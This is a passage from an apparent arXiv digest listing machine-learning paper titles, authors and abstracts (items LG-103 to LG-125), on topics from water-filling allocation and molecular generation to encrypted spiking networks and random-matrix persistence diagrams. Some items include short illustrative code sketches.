Abstract:Machine learning models often struggle to generalize across domains with varying data distributions, such as differing noise levels, leading to degraded performance. Traditional strategies like personalized training, which trains separate models per domain, and joint training, which uses a single model for all domains, have significant limitations in flexibility and effectiveness. To address this, we propose two novel domain adaptation methods for regression tasks based on interpretable unrolled networks–deep architectures inspired by iterative optimization algorithms. These models leverage the functional dependence of select tunable parameters on domain variables, enabling controlled adaptation during inference. Our methods include Parametric Tunable-Domain Adaptation (P-TDA), which uses known domain parameters for dynamic tuning, and Data-Driven Tunable-Domain Adaptation (DD-TDA), which infers domain adaptation directly from input data. We validate our approach on compressed sensing problems involving noise-adaptive sparse signal recovery, domain-adaptive gain calibration, and domain-adaptive phase retrieval, demonstrating improved or comparable performance to domain-specific models while surpassing joint training baselines. This work highlights the potential of unrolled networks for effective, interpretable domain adaptation in regression settings.
[LG-103] Water-Filling is Universally Minimax Optimal
Link: https://arxiv.org/abs/2603.26893
Authors: Siddhartha Banerjee,Ramiro N. Deo-Campo Vuong,Robert Kleinberg
Subjects: Data Structures and Algorithms (cs.DS); Computer Science and Game Theory (cs.GT); Machine Learning (cs.LG)
*Comments:
Abstract:Allocation of dynamically-arriving (i.e., online) divisible resources among a set of offline agents is a fundamental problem, with applications to online marketplaces, scheduling, portfolio selection, signal processing, and many other areas. The water-filling algorithm, which allocates an incoming resource to maximize the minimum load of compatible agents, is ubiquitous in many of these applications whenever the underlying objectives prefer more balanced solutions; however, the analysis and guarantees differ across settings. We provide a justification for the widespread use of water-filling by showing that it is a universally minimax optimal policy in a strong sense. Formally, our main result implies that water-filling is minimax optimal for a large class of objectives – including both Schur-concave maximization and Schur-convex minimization – under \alpha -regret and competitive ratio measures. This optimality holds for every fixed tuple of agents and resource counts. Remarkably, water-filling achieves these guarantees as a myopic policy, remaining entirely agnostic to the objective function, agent count, and resource availability. Our techniques notably depart from the popular primal-dual analysis of online algorithms, and instead develop a novel way to apply the theory of majorization in online settings to achieve universality guarantees.
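The water-filling policy itself is simple to state: on each arrival, pour the resource onto the compatible agents so that the lowest loads rise to a common "water level". A minimal sketch for a single divisible arrival (illustrative, not the authors' code):

```python
def water_fill(loads, compat, amount):
    """Allocate `amount` of a divisible resource among the compatible agents
    so as to maximize the minimum resulting load. Returns per-agent shares."""
    agents = sorted(compat, key=lambda a: loads[a])
    n = len(agents)
    level = loads[agents[0]]
    for i in range(n):
        nxt = loads[agents[i + 1]] if i + 1 < n else float("inf")
        need = (nxt - level) * (i + 1)  # budget to raise the current group to the next load
        if need > amount:
            level += amount / (i + 1)   # budget exhausted below the next load
            break
        amount -= need
        level = nxt                     # next agent joins the group at this level
    return {a: max(0.0, level - loads[a]) for a in agents}

# Agent A starts at load 1, B at load 3; 4 units of resource equalize both at 4.
alloc = water_fill({"A": 1.0, "B": 3.0}, ["A", "B"], 4.0)
```

Note the myopia the paper highlights: the rule never consults an objective function or future arrivals, only the current loads of compatible agents.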
[LG-104] Property-Guided Molecular Generation and Optimization via Latent Flows ICLR2026
Link: https://arxiv.org/abs/2603.26889
Authors: Alexander Arjun Lobo,Urvi Awasthi,Leonid Zhukov
Subjects: Machine Learning (cs.LG); Materials Science (cond-mat.mtrl-sci)
*Comments: 25 pages, 18 figures. Accepted to ICLR 2026 AI4Mat Workshop
Abstract:Molecular discovery is increasingly framed as an inverse design problem: identifying molecular structures that satisfy desired property profiles under feasibility constraints. While recent generative models provide continuous latent representations of chemical space, targeted optimization within these representations often leads to degraded validity, loss of structural fidelity, or unstable behavior. We introduce MoltenFlow, a modular framework that combines property-organized latent representations with flow-matching generative priors and gradient-based guidance. This formulation supports both conditioned generation and local optimization within a single latent-space framework. We show that guided latent flows enable efficient multi-objective molecular optimization under fixed oracle budgets with controllable trade-offs, while a learned flow prior improves unconditional generation quality.
[LG-105] A Hierarchical Sheaf Spectral Embedding Framework for Single-Cell RNA-seq Analysis
Link: https://arxiv.org/abs/2603.26858
Authors: Xiang Xiang Wang,Guo-Wei Wei
Subjects: Machine Learning (cs.LG); Spectral Theory (math.SP); Genomics (q-bio.GN); Machine Learning (stat.ML)
*Comments:
Abstract:Single-cell RNA-seq data analysis typically requires representations that capture heterogeneous local structure across multiple scales while remaining stable and interpretable. In this work, we propose a hierarchical sheaf spectral embedding (HSSE) framework that constructs informative cell-level features based on persistent sheaf Laplacian analysis. Starting from scale-dependent low-dimensional embeddings, we define cell-centered local neighborhoods at multiple resolutions. For each local neighborhood, we construct a data-driven cellular sheaf that encodes local relationships among cells. We then compute persistent sheaf Laplacians over sampled filtration intervals and extract spectral statistics that summarize the evolution of local relational structure across scales. These spectral descriptors are aggregated into a unified feature vector for each cell and can be directly used in downstream learning tasks without additional model training. We evaluate HSSE on twelve benchmark single-cell RNA-seq datasets covering diverse biological systems and data scales. Under a consistent classification protocol, HSSE achieves competitive or improved performance compared with existing multiscale and classical embedding-based methods across multiple evaluation metrics. The results demonstrate that sheaf spectral representations provide a robust and interpretable approach for single-cell RNA-seq data representation learning.
[LG-106] Stringological sequence prediction I: efficient algorithms for predicting highly repetitive sequences
Link: https://arxiv.org/abs/2603.26852
Authors: Vanessa Kosoy
Subjects: Formal Languages and Automata Theory (cs.FL); Data Structures and Algorithms (cs.DS); Machine Learning (cs.LG)
*Comments: 43 pages
Abstract:We propose novel algorithms for sequence prediction based on ideas from stringology. These algorithms are time and space efficient and satisfy mistake bounds related to particular stringological complexity measures of the sequence. In this work (the first in a series) we focus on two such measures: (i) the size of the smallest straight-line program that produces the sequence, and (ii) the number of states in the minimal automaton that can compute any symbol in the sequence when given its position in base k as input. These measures are interesting because multiple rich classes of sequences studied in combinatorics of words (automatic sequences, morphic sequences, Sturmian words) have low complexity and hence high predictability in this sense.
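The paper's algorithms are more refined, but the flavor of stringological prediction can be illustrated with a classic suffix-matching predictor: reuse whatever symbol followed the longest earlier occurrence of the current suffix. This toy version is ours and makes no mistake-bound claims.

```python
def predict_next(seq):
    """Predict the next symbol of `seq` by locating the longest suffix of
    `seq` that also occurred strictly earlier, and returning the symbol
    that followed that earlier occurrence. Works well on highly repetitive
    sequences, where long suffixes recur."""
    for k in range(len(seq) - 1, 0, -1):
        suf = seq[-k:]
        i = seq.find(suf, 0, len(seq) - 1)  # earlier (possibly overlapping) occurrence
        if i != -1:
            return seq[i + k]
    return seq[-1] if seq else None
```

On the purely periodic word "abcabcab" the longest repeated suffix is "abcab", whose earlier occurrence is followed by "c", so the predictor continues the period, which is exactly the kind of regularity the paper's complexity measures quantify.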
[LG-107] A Comparative Investigation of Thermodynamic Structure-Informed Neural Networks
Link: https://arxiv.org/abs/2603.26803
Authors: Guojie Li,Liu Hong
Subjects: Machine Learning (cs.LG); Machine Learning (stat.ML)
*Comments: 30 pages, 9 figures, 2 tables
Abstract:Physics-informed neural networks (PINNs) offer a unified framework for solving both forward and inverse problems of differential equations, yet their performance and physical consistency strongly depend on how governing laws are incorporated. In this work, we present a systematic comparison of different thermodynamic structure-informed neural networks by incorporating various thermodynamics formulations, including Newtonian, Lagrangian, and Hamiltonian mechanics for conservative systems, as well as the Onsager variational principle and extended irreversible thermodynamics for dissipative systems. Through comprehensive numerical experiments on representative ordinary and partial differential equations, we quantitatively evaluate the impact of these formulations on accuracy, physical consistency, noise robustness, and interpretability. The results show that Newtonian-residual-based PINNs can reconstruct system states but fail to reliably recover key physical and thermodynamic quantities, whereas structure-preserving formulation significantly enhances parameter identification, thermodynamic consistency, and robustness. These findings provide practical guidance for principled design of thermodynamics-consistency model, and lay the groundwork for integrating more general nonequilibrium thermodynamic structures into physics-informed machine learning.
[LG-108] Gaussian Joint Embeddings For Self-Supervised Representation Learning
Link: https://arxiv.org/abs/2603.26799
Authors: Yongchao Huang
Subjects: Machine Learning (cs.LG)
*Comments: 92 pages
Abstract:Self-supervised representation learning often relies on deterministic predictive architectures to align context and target views in latent space. While effective in many settings, such methods are limited in genuinely multi-modal inverse problems, where squared-loss prediction collapses towards conditional averages, and they frequently depend on architectural asymmetries to prevent representation collapse. In this work, we propose a probabilistic alternative based on generative joint modeling. We introduce Gaussian Joint Embeddings (GJE) and its multi-modal extension, Gaussian Mixture Joint Embeddings (GMJE), which model the joint density of context and target representations and replace black-box prediction with closed-form conditional inference under an explicit probabilistic model. This yields principled uncertainty estimates and a covariance-aware objective for controlling latent geometry. We further identify a failure mode of naive empirical batch optimization, which we term the Mahalanobis Trace Trap, and develop several remedies spanning parametric, adaptive, and non-parametric settings, including prototype-based GMJE, conditional Mixture Density Networks (GMJE-MDN), topology-adaptive Growing Neural Gas (GMJE-GNG), and a Sequential Monte Carlo (SMC) memory bank. In addition, we show that standard contrastive learning can be interpreted as a degenerate non-parametric limiting case of the GMJE framework. Experiments on synthetic multi-modal alignment tasks and vision benchmarks show that GMJE recovers complex conditional structure, learns competitive discriminative representations, and defines latent densities that are better suited to unconditional sampling than deterministic or unimodal baselines.
[LG-109] MemGuard-Alpha: Detecting and Filtering Memorization-Contaminated Signals in LLM-Based Financial Forecasting via Membership Inference and Cross-Model Disagreement
Link: https://arxiv.org/abs/2603.26797
Authors: Anisha Roy,Dip Roy
Subjects: Machine Learning (cs.LG)
*Comments:
Abstract:Large language models (LLMs) are increasingly used to generate financial alpha signals, yet growing evidence shows that LLMs memorize historical financial data from their training corpora, producing spurious predictive accuracy that collapses out-of-sample. This memorization-induced look-ahead bias threatens the validity of LLM-based quantitative strategies. Prior remedies – model retraining and input anonymization – are either prohibitively expensive or introduce significant information loss. No existing method offers practical, zero-cost signal-level filtering for real-time trading. We introduce MemGuard-Alpha, a post-generation framework comprising two algorithms: (i) the MemGuard Composite Score (MCS), which combines five membership inference attack (MIA) methods with temporal proximity features via logistic regression, achieving Cohen’s d = 18.57 for contamination separation (d = 0.39-1.37 using MIA features alone); and (ii) Cross-Model Memorization Disagreement (CMMD), which exploits variation in training cutoff dates across LLMs to separate memorized signals from genuine reasoning. Evaluated across seven LLMs (124M-7B parameters), 50 S&P 100 stocks, 42,800 prompts, and five MIA methods over 5.5 years (2019-2024), CMMD achieves a Sharpe ratio of 4.11 versus 2.76 for unfiltered signals (49% improvement). Clean signals produce 14.48 bps average daily return versus 2.13 bps for tainted signals (7x difference). A striking crossover pattern emerges: in-sample accuracy rises with contamination (40.8% to 52.5%) while out-of-sample accuracy falls (47% to 42%), providing direct evidence that memorization inflates apparent accuracy at the cost of generalization.
[LG-110] Efficient Encrypted Computation in Convolutional Spiking Neural Networks with TFHE
Link: https://arxiv.org/abs/2603.26781
Authors: Longfei Guo,Pengbo Li,Ting Gao,Yonghai Zhong,Haojie Fan,Jinqiao Duan
Subjects: Cryptography and Security (cs.CR); Machine Learning (cs.LG)
*Comments:
Abstract:With the rapid advancement of AI technology, we have seen more and more concerns on data privacy, leading to some cutting-edge research on machine learning with encrypted computation. Fully Homomorphic Encryption (FHE) is a crucial technology for privacy-preserving computation, while it struggles with continuous non-polynomial functions, as it operates on discrete integers and supports only addition and multiplication. Spiking Neural Networks (SNNs), which use discrete spike signals, naturally complement FHE’s characteristics. In this paper, we introduce FHE-DiCSNN, a framework built on the TFHE scheme, utilizing the discrete nature of SNNs for secure and efficient computations. By leveraging bootstrapping techniques, we successfully implement Leaky Integrate-and-Fire (LIF) neuron models on ciphertexts, allowing SNNs of arbitrary depth. Our framework is adaptable to other spiking neuron models, offering a novel approach to homomorphic evaluation of SNNs. Additionally, we integrate convolutional methods inspired by CNNs to enhance accuracy and reduce the simulation time associated with random encoding. Parallel computation techniques further accelerate bootstrapping operations. Experimental results on the MNIST and FashionMNIST datasets validate the effectiveness of FHE-DiCSNN, with an accuracy loss of less than 3% compared to plaintext computation and computation times of under 1 second per prediction. We also apply the model to real medical image classification problems and analyze parameter optimization and selection.
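For orientation, the plaintext dynamics of the Leaky Integrate-and-Fire neuron can be sketched as below; in FHE-DiCSNN the threshold comparison and reset are what TFHE bootstrapping evaluates on ciphertexts, which this cleartext sketch does not attempt. Parameter names and values are illustrative.

```python
import numpy as np

def lif_forward(inputs, weights, v_th=1.0, leak=0.9):
    """Plaintext Leaky Integrate-and-Fire layer over discrete time steps.
    `inputs` has shape (T, n_in); `weights` has shape (n_in, n_out).
    Returns the binary spike train of shape (T, n_out)."""
    T = inputs.shape[0]
    v = np.zeros(weights.shape[1])
    spikes = np.zeros((T, weights.shape[1]))
    for t in range(T):
        v = leak * v + inputs[t] @ weights   # leaky integration of input current
        fired = v >= v_th                    # threshold comparison (bootstrapped in TFHE)
        spikes[t] = fired
        v = np.where(fired, 0.0, v)          # reset membrane potential after a spike
    return spikes

# A constant input current above threshold makes the neuron spike every step.
inputs = np.ones((5, 2))
weights = np.full((2, 1), 0.6)
spikes = lif_forward(inputs, weights)
```

The appeal for FHE is visible here: the neuron's state update needs only additions, multiplications, and one sign-like comparison per step, and its outputs are already discrete.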
[LG-111] Robot Arm Control via Cognitive Map Learners
Link: https://arxiv.org/abs/2603.26773
Authors: Nathan McDonald,Colyn Seeley,Christian Brazeau
Subjects: Robotics (cs.RO); Machine Learning (cs.LG)
*Comments:
Abstract:Cognitive map learners (CML) have been shown to enable hierarchical, compositional machine learning. That is, independently trained CML modules can be arbitrarily composed together to solve more complex problems without task-specific retraining. This work applies this approach to control the movement of a multi-jointed robot arm, whereby each arm segment’s angular position is governed by an independently trained CML. Operating in a 2D Cartesian plane, target points are encoded as phasor hypervectors according to fractional power encoding (FPE). This phasor hypervector is then factorized into a set of arm segment angles either via a resonator network or a modern Hopfield network. These arm segment angles are subsequently fed to their respective arm segment CMLs, which reposition the robot arm to the target point without the use of inverse kinematic equations. This work presents both a general solution for a 2D robot arm with an arbitrary number of arm segments and a particular solution for a 3D arm with a single rotating base.
[LG-112] Evolutionary Warm-Starts for Reinforcement Learning in Industrial Continuous Control
Link: https://arxiv.org/abs/2603.26750
Authors: Tom Maus,Stephan Frank,Tobias Glasmachers
Subjects: Neural and Evolutionary Computing (cs.NE); Machine Learning (cs.LG)
*Comments: 4 pages, 2 figures
Abstract:Reinforcement learning (RL) is still rarely applied in industrial control, partly due to the difficulty of training reliable agents for real-world conditions. This work investigates how evolution strategies can support RL in such settings by introducing a continuous-control adaptation of an industrial sorting benchmark. The CMA-ES algorithm is used to generate high-quality demonstrations that warm-start RL agents. Results show that CMA-ES-guided initialization significantly improves stability and performance. Furthermore, the demonstration trajectories generated with the CMA-ES provide a strong oracle reference performance level, which is of interest in its own right. The study delivers a focused proof of concept for hybrid evolutionary-RL approaches and a basis for future, more complex industrial applications.
[LG-113] Mixture of Experts with Soft Nearest Neighbor Loss: Resolving Expert Collapse via Representation Disentanglement
Link: https://arxiv.org/abs/2603.26734
Authors: Abien Fred Agarap,Arnulfo P. Azcarraga
Subjects: Neural and Evolutionary Computing (cs.NE); Machine Learning (cs.LG)
*Comments: 7 pages, 7 figures, accepted for oral presentation at the Philippine Computing Science Congress 2026
Abstract:The Mixture-of-Experts (MoE) model uses a set of expert networks that specialize on subsets of a dataset under the supervision of a gating network. A common issue in MoE architectures is "expert collapse", where overlapping class boundaries in the raw input feature space cause multiple experts to learn redundant representations, thus forcing the gating network into rigid routing to compensate. We propose an enhanced MoE architecture that utilizes a feature extractor network optimized using Soft Nearest Neighbor Loss (SNNL) prior to feeding input features to the gating and expert networks. By pre-conditioning the latent space to minimize distances among class-similar data points, we resolve structural expert collapse, which results in experts learning highly orthogonal weights. We employ Expert Specialization Entropy and Pairwise Embedding Similarity to quantify this dynamic. We evaluate our experimental approach across four benchmark image classification datasets (MNIST, FashionMNIST, CIFAR10, and CIFAR100), and we show our SNNL-augmented MoE models demonstrate structurally diverse experts which allow the gating network to adopt a more flexible routing strategy. This paradigm significantly improves classification accuracy on the FashionMNIST, CIFAR10, and CIFAR100 datasets.
[LG-114] Boundary-aware Prototype-driven Adversarial Alignment for Cross-Corpus EEG Emotion Recognition
Link: https://arxiv.org/abs/2603.26713
Authors: Guangli Li,Canbiao Wu,Na Tian,Li Zhang,Zhen Liang
Subjects: Machine Learning (cs.LG); Signal Processing (eess.SP); Machine Learning (stat.ML)
*Comments:
Abstract:Electroencephalography (EEG)-based emotion recognition suffers from severe performance degradation when models are transferred across heterogeneous datasets due to physiological variability, experimental paradigm differences, and device inconsistencies. Existing domain adversarial methods primarily enforce global marginal alignment and often overlook class-conditional mismatch and decision boundary distortion, limiting cross-corpus generalization. In this work, we propose a unified Prototype-driven Adversarial Alignment (PAA) framework for cross-corpus EEG emotion recognition. The framework is progressively instantiated in three configurations: PAA-L, which performs prototype-guided local class-conditional alignment; PAA-C, which further incorporates contrastive semantic regularization to enhance intra-class compactness and inter-class separability; and PAA-M, the full boundary-aware configuration that integrates dual relation-aware classifiers within a three-stage adversarial optimization scheme to explicitly refine controversial samples near decision boundaries. By combining prototype-guided subdomain alignment, contrastive discriminative enhancement, and boundary-aware aggregation within a coherent adversarial architecture, the proposed framework reformulates emotion recognition as a relation-driven representation learning problem, reducing sensitivity to label noise and improving cross-domain stability. Extensive experiments on SEED, SEED-IV, and SEED-V demonstrate state-of-the-art performance under four cross-corpus evaluation protocols, with average improvements of 6.72%, 5.59%, 6.69%, and 4.83%, respectively. Furthermore, the proposed framework generalizes effectively to clinical depression identification scenarios, validating its robustness in real-world heterogeneous settings. The source code is available at this https URL
[LG-115] Mitigating Forgetting in Continual Learning with Selective Gradient Projection
Link: https://arxiv.org/abs/2603.26671
Authors: Anika Singh,Aayush Dhaulakhandi,Varun Chopade,Likhith Malipati,David Martinez,Kevin Zhu
Subjects: Machine Learning (cs.LG); Optimization and Control (math.OC)
*Comments: 15 pages, 2 figures, Accepted to the Student Research Workshop at International Joint Conference on Natural Language Processing Asia-Pacific Chapter of the Association for Computational Linguistics, 2025
Abstract:As neural networks are increasingly deployed in dynamic environments, they face the challenge of catastrophic forgetting, the tendency to overwrite previously learned knowledge when adapting to new tasks, resulting in severe performance degradation on earlier tasks. We propose Selective Forgetting-Aware Optimization (SFAO), a dynamic method that regulates gradient directions via cosine similarity and per-layer gating, enabling controlled forgetting while balancing plasticity and stability. SFAO selectively projects, accepts, or discards updates using a tunable mechanism with efficient Monte Carlo approximation. Experiments on standard continual learning benchmarks show that SFAO achieves competitive accuracy with markedly lower memory cost, a 90% reduction, and reduced forgetting on MNIST datasets, making it suitable for resource-constrained scenarios.
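The gradient-direction regulation described above can be illustrated with a minimal cosine-gated projection; the acceptance threshold, the single reference gradient, and the per-tensor application below are our simplifications, not the exact SFAO rule.

```python
import numpy as np

def sfao_update(grad_new, grad_ref, tau=0.0):
    """Gate a new task's gradient against a reference gradient from earlier
    tasks: accept it when the cosine similarity is at least `tau`, otherwise
    project out the component that conflicts with the reference direction."""
    g, r = grad_new.ravel(), grad_ref.ravel()
    cos = g @ r / (np.linalg.norm(g) * np.linalg.norm(r) + 1e-12)
    if cos >= tau:
        return grad_new  # accept: the update does not oppose old-task directions
    # Remove the conflicting component along the reference direction.
    proj = (g @ r) / (r @ r + 1e-12) * r
    return (g - proj).reshape(grad_new.shape)

r = np.array([1.0, 0.0])      # reference direction from earlier tasks
g = np.array([-1.0, 0.5])     # conflicting new-task gradient
out = sfao_update(g, r)       # projected update, orthogonal to r
```

After projection the applied update is orthogonal to the reference direction, so first-order interference with the earlier task's loss along that direction is removed while the non-conflicting component survives.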
[LG-116] Functional Natural Policy Gradients
Link: https://arxiv.org/abs/2603.28681
Authors: Aurelien Bibaut,Houssam Zenati,Thibaud Rahier,Nathan Kallus
Subjects: Machine Learning (stat.ML); Machine Learning (cs.LG)
*Comments:
Abstract:We propose a cross-fitted debiasing device for policy learning from offline data. A key consequence of the resulting learning principle is \sqrt{N} regret even for policy classes with complexity greater than Donsker, provided a product-of-errors nuisance remainder is O(N^{-1/2}). The regret bound factors into a plug-in policy error factor governed by policy-class complexity and an environment nuisance factor governed by the complexity of the environment dynamics, making explicit how one may be traded against the other.
[LG-117] Universal Approximation Constraints of Narrow ResNets: The Tunnel Effect
Link: https://arxiv.org/abs/2603.28591
Authors: Christian Kuehn,Sara-Viola Kuntz,Tobias Wöhrer
Subjects: Dynamical Systems (math.DS); Machine Learning (cs.LG)
*Comments:
Abstract:We analyze the universal approximation constraints of narrow Residual Neural Networks (ResNets) both theoretically and numerically. For deep neural networks without input space augmentation, a central constraint is the inability to represent critical points of the input-output map. We prove that this has global consequences for target function approximations and show that the manifestation of this defect is typically a shift of the critical point to infinity, which we call the "tunnel effect" in the context of classification tasks. While ResNets offer greater expressivity than standard multilayer perceptrons (MLPs), their capability strongly depends on the signal ratio between the skip and residual channels. We establish quantitative approximation bounds for both the residual-dominant (close to MLP) and skip-dominant (close to neural ODE) regimes. These estimates depend explicitly on the channel ratio and uniform network weight bounds. Low-dimensional examples further provide a detailed analysis of the different ResNet regimes and how architecture-target incompatibility influences the approximation error.
[LG-118] Yau's Affine Normal Descent: Algorithmic Framework and Convergence Analysis
Link: https://arxiv.org/abs/2603.28448
Authors: Yi-Shuai Niu,Artan Sheshmani,Shing-Tung Yau
Subjects: Optimization and Control (math.OC); Machine Learning (cs.LG); Differential Geometry (math.DG); Numerical Analysis (math.NA)
*Comments: 55 pages, 25 figures
Abstract:We propose Yau’s Affine Normal Descent (YAND), a geometric framework for smooth unconstrained optimization in which search directions are defined by the equi-affine normal of level-set hypersurfaces. The resulting directions are invariant under volume-preserving affine transformations and intrinsically adapt to anisotropic curvature. Using the analytic representation of the affine normal from affine differential geometry, we establish its equivalence with the classical slice-centroid construction under convexity. For strictly convex quadratic objectives, affine-normal directions are collinear with Newton directions, implying one-step convergence under exact line search. For general smooth (possibly nonconvex) objectives, we characterize precisely when affine-normal directions yield strict descent and develop a line-search-based YAND. We establish global convergence under standard smoothness assumptions, linear convergence under strong convexity and Polyak-Lojasiewicz conditions, and quadratic local convergence near nondegenerate minimizers. We further show that affine-normal directions are robust under affine scalings, remaining insensitive to arbitrarily ill-conditioned transformations. Numerical experiments illustrate the geometric behavior of the method and its robustness under strong anisotropic scaling.
[LG-119] LDDMM stochastic interpolants: an application to domain uncertainty quantification in hemodynamics
Link: https://arxiv.org/abs/2603.28324
Authors: Sarah Katz,Francesco Romor,Jia-Jie Zhu,Alfonso Caiazzo
Subjects: Machine Learning (stat.ML); Machine Learning (cs.LG); Numerical Analysis (math.NA)
*Comments:
Abstract:We introduce a novel conditional stochastic interpolant framework for generative modeling of three-dimensional shapes. The method builds on a recent LDDMM-based registration approach to learn the conditional drift between geometries. By leveraging the resulting pull-back and push-forward operators, we extend this formulation beyond standard Cartesian grids to complex shapes and random variables defined on distinct domains. We present an application in the context of cardiovascular simulations, where aortic shapes are generated from an initial cohort of patients. The conditioning variable is a latent geometric representation defined by a set of centerline points and the radii of the corresponding inscribed spheres. This methodology facilitates both data augmentation for three-dimensional biomedical shapes, and the generation of random perturbations of controlled magnitude for a given shape. These capabilities are essential for quantifying the impact of domain uncertainties arising from medical image segmentation on the estimation of relevant biomarkers.
[LG-120] Learning from imperfect quantum data via unsupervised domain adaptation with classical shadows
Link: https://arxiv.org/abs/2603.28294
Authors: Kosuke Ito,Akira Tanji,Hiroshi Yano,Yudai Suzuki,Naoki Yamamoto
Subjects: Quantum Physics (quant-ph); Machine Learning (cs.LG)
*Comments: 23 pages, 6 figures
Abstract:Learning from quantum data using classical machine learning models has emerged as a promising paradigm toward realizing quantum advantages. Despite extensive analyses on their performance, clean and fully labeled quantum data from the target domain are often unavailable in practical scenarios, forcing models to be trained on data collected under conditions that differ from those encountered at deployment. This mismatch highlights the need for new approaches beyond the common assumptions of prior work. In this work, we address this issue by employing an unsupervised domain adaptation framework for learning from imperfect quantum data. Specifically, by leveraging classical representations of quantum states obtained via classical shadows, we perform unsupervised domain adaptation entirely within a classical computational pipeline once measurements on the quantum states are executed. We numerically evaluate the framework on quantum phases of matter and entanglement classification tasks under realistic domain shifts. Across both tasks, our method outperforms source-only non-adaptive baselines and target-only unsupervised learning approaches, demonstrating the practical applicability of domain adaptation to realistic quantum data learning.
[LG-121] Nonlinear Factor Decomposition via Kolmogorov-Arnold Networks: A Spectral Approach to Asset Return Analysis
链接: https://arxiv.org/abs/2603.28257
作者: David Breazu
类目: Statistical Finance (q-fin.ST); Machine Learning (cs.LG)
*备注: 12 pages, 2 figures
Abstract:KAN-PCA is an autoencoder that uses a KAN as encoder and a linear map as decoder. It generalizes classical PCA by replacing linear projections with learned B-spline functions on each edge. The motivation is to capture more variance than classical PCA, which becomes inefficient during market crises when the linear assumption breaks down and correlations between assets change dramatically. We prove that if the spline activations are forced to be linear, KAN-PCA yields exactly the same results as classical PCA, establishing PCA as a special case. Experiments on 20 S&P 500 stocks (2015-2024) show that KAN-PCA achieves a reconstruction R^2 of 66.57%, compared to 62.99% for classical PCA with the same 3 factors, while matching PCA out-of-sample after correcting for data leakage in the training procedure.
[LG-122] Transformer-Based Prognostics: Enhancing Network Availability by Improved Monitoring of Optical Fiber Amplifiers
链接: https://arxiv.org/abs/2603.28081
作者: Dominic Schneider,Lutz Rapp,Christoph Ament
类目: Signal Processing (eess.SP); Machine Learning (cs.LG)
*备注: This paper has been accepted for publication at the Optical Fiber Communication (OFC) Conference 2026
Abstract:We enhance optical network availability and reliability through a lightweight transformer model that predicts optical fiber amplifier lifetime from condition-based monitoring data, enabling real-time, edge-level predictive maintenance and advancing deployable AI for autonomous network operation.
[LG-123] BiFormer3D: Grid-Free Time-Domain Reconstruction of Head-Related Impulse Responses with a Spatially Encoded Transformer INTERSPEECH2026
链接: https://arxiv.org/abs/2603.27998
作者: Shaoheng Xu,Chunyi Sun,Jihui Zhang,Amy Bastine,Prasanga N. Samarasinghe,Thushara D. Abhayapala,Hongdong Li
类目: Audio and Speech Processing (eess.AS); Machine Learning (cs.LG)
*备注: The paper was submitted for review to Interspeech 2026
Abstract:Individualized head-related impulse responses (HRIRs) enable binaural rendering, but dense per-listener measurements are costly. We address HRIR spatial up-sampling from sparse per-listener measurements: given a few measured HRIRs for a listener, predict HRIRs at unmeasured target directions. Prior learning methods often work in the frequency domain, rely on minimum-phase assumptions or separate timing models, and use a fixed direction grid, which can degrade temporal fidelity and spatial continuity. We propose BiFormer3D, a time-domain, grid-free binaural Transformer for reconstructing HRIRs at arbitrary directions from sparse inputs. It uses sinusoidal spatial features, a Conv1D refinement module, and auxiliary interaural time difference (ITD) and interaural level difference (ILD) heads. On SONICOM, it improves normalized mean squared error (NMSE), cosine distance, and ITD/ILD errors over prior methods; ablations validate modules and show minimum-phase pre-processing is unnecessary.
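The sinusoidal spatial features mentioned above can be sketched in a few lines. Note that the frequency schedule and feature layout here are illustrative assumptions, not the paper's exact encoding:

```python
import math

def sinusoidal_direction_features(azimuth, elevation, num_freqs=4):
    """Encode an (azimuth, elevation) direction as sin/cos features at
    geometrically spaced frequencies. Hypothetical layout for illustration;
    BiFormer3D's actual feature construction may differ."""
    feats = []
    for angle in (azimuth, elevation):
        for k in range(num_freqs):
            f = 2.0 ** k  # frequencies 1, 2, 4, ...
            feats.append(math.sin(f * angle))
            feats.append(math.cos(f * angle))
    return feats

# 2 angles * 2 frequencies * (sin, cos) = 8 features
feats = sinusoidal_direction_features(0.0, math.pi / 2, num_freqs=2)
```

Such encodings let the network condition on arbitrary continuous directions, which is what makes a grid-free formulation possible.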
[LG-124] Persistence diagrams of random matrices via Morse theory: universality and a new spectral diagnostic
链接: https://arxiv.org/abs/2603.27903
作者: Matthew Loftus
类目: Machine Learning (stat.ML); Machine Learning (cs.LG); Mathematical Physics (math-ph); Algebraic Topology (math.AT)
*备注: 7 pages, 5 figures, 4 tables
Abstract:We prove that the persistence diagram of the sublevel set filtration of the quadratic form f(x) = x^T M x restricted to the unit sphere S^{n-1} is analytically determined by the eigenvalues of the symmetric matrix M. By Morse theory, the diagram has exactly n-1 finite bars, with the k-th bar living in homological dimension k-1 and having length equal to the k-th eigenvalue spacing s_k = \lambda_{k+1} - \lambda_k. This identification transfers random matrix theory (RMT) universality to persistence diagram universality: for matrices drawn from the Gaussian Orthogonal Ensemble (GOE), we derive the closed-form persistence entropy PE = \log(8n/\pi) - 1, and verify numerically that the coefficient of variation of persistence statistics decays as n^{-0.6}. Different random matrix ensembles (GOE, GUE, Wishart) produce distinct universal persistence diagrams, providing topological fingerprints of RMT universality classes. As a practical consequence, we show that persistence entropy outperforms the standard level spacing ratio \langle r \rangle for discriminating GOE from GUE matrices (AUC 0.978 vs. 0.952 at n = 100, non-overlapping bootstrap 95% CIs), and detects global spectral perturbations in the Rosenzweig-Porter model to which \langle r \rangle is blind. These results establish persistence entropy as a new spectral diagnostic that captures complementary information to existing RMT tools.
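The identification above — finite bars whose lengths are consecutive eigenvalue spacings — makes persistence entropy directly computable from a spectrum. A minimal sketch of that computation:

```python
import math

def persistence_entropy(eigenvalues):
    """Persistence entropy of a diagram whose finite bars have lengths equal
    to consecutive eigenvalue spacings, as in the paper's Morse-theory
    identification: PE = -sum(p_k * log p_k), p_k = s_k / sum(s_j)."""
    evs = sorted(eigenvalues)
    bars = [b - a for a, b in zip(evs, evs[1:])]  # the n-1 finite bars
    total = sum(bars)
    probs = [s / total for s in bars if s > 0]
    return -sum(p * math.log(p) for p in probs)

# Equally spaced eigenvalues give uniform bar lengths, hence the maximal
# entropy log(n-1)
pe = persistence_entropy([0.0, 1.0, 2.0, 3.0])
```

For GOE matrices one would instead feed in the spectrum of a sampled symmetric Gaussian matrix and compare against the closed form PE = log(8n/pi) - 1.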
[LG-125] Statistical Guarantees for Distributionally Robust Optimization with Optimal Transport and OT-Regularized Divergences
链接: https://arxiv.org/abs/2603.27871
作者: Jeremiah Birrell,Xiaoxi Shen
类目: Machine Learning (stat.ML); Machine Learning (cs.LG)
*备注: 24 pages
